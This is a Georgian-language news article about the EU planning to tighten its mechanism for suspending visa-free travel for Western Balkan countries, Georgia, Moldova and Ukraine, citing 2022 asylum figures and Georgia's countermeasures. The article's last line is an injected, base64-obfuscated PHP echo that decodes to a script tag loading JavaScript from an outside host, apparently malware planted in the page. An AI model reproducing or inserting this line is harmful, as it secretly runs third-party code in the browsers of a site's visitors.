celsiusi
ავერსი შნაიდერი

ევროკავშირი ორგანიზაციის არაწევრ ქვეყნებთან, რომლებიც უვიზო რეჟიმით სარგებლობენ, უვიზო მიმოსვლის შეჩერების მექანიზმის გამკაცრებას გეგმავს.

კერძოდ, აღნიშნულ ქვეყნებს შორის არის ალბანეთი, ბოსნია და ჰერცეგოვინა, მონტენეგრო, ჩრდილოეთ მაკედონია, სერბეთი, საქართველო, მოლდოვა და უკრაინა.

როგორც ევროკომისიის დოკუმენტშია აღნიშნული, კომისია ევროპარლამენტთან და ევროკავშირის საბჭოსთან ერთად იწყებს კონსულტაციებს, რათა განსაზღვროს, თუ როგორ უნდა გააუმჯობესოს უვიზო რეჟიმის შეჩერების მექანიზმი.

უვიზო რეჟიმის შეჩერების მექანიზმი განსაზღვრულია სავიზო რეგულაციების მერვე მუხლით. მისი მთავარი მიზანია, უზრუნველყოს უვიზო რეჟიმის დროებითი შეჩერება არალეგალური მიგრაციის მნიშნვნელოვანი ზრდის ან ევროკავშირის უსაფრთხოების რისკების ზრდის შემთხვევაში.

როგორც ევროკომისიაში აღნიშნავენ, უვიზო რეჟიმს მნიშვნელოვანი ეკონომიკური, სოციალური და კულტურული სარგებელი მოაქვს ევროკავშირის წევრი და მესამე ქვეყნებისთვის, თუმცა ამასთან მნიშვნელოვანი გამოწვევების შექმნა შეუძლია უსაფრთხოებისა და მიგრაციის კუთხით.

კერძოდ, რისკები დაკავშირებულია ორგანიზაციულ დანაშაულებებთან ფულის გათეთრებასთან, გადასახადებისგან თავის არიდებასთან და კორუფციასთან.

ევროსტატის მონაცემებით, 2022 წელს თავშესაფრისთვის მოთხოვნის განცხადება ევროკავშირის ქვეყნებში საქართველოდან 28 385 ადამიანმა გააკეთა.

ევროკომიის გავრცელებულ განცხადებაში აღნიშნულია, რომ საქართველომ ძალისხმევის შედეგად აცნობა საკუთარ მოქალაქეებს აღნიშნული მიმოსვლის უფლებებისა და მოვალეობის შესახებ, რათა თავიდან აეცილებინათ უვიზო მიმოსვლის ბოროტად გამოყენება. კონკრეტულად, საქართველომ სათანადოდ აწარმოა გამგზავრებისას სასაზღვრო შემოწმება, ასევე ჩაატარა ცნობიერების ამაღლების კამპანიები უვიზო რეჟიმის უფლებებისა და მოვალეობების შესახებ თავშესაფრის მოთხოვნის მაღალი რაოდენობის ძირითადი მიზეზების აღმოსაფხვრელად. ამასთან, გაძლიერდა თანამშრომლობა „ევროპოლთან“ და ევროკავშირის საზღვრის დაცვის სააგენტოსთან აღნიშნული საკითხების გადასაჭრელად.

322
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");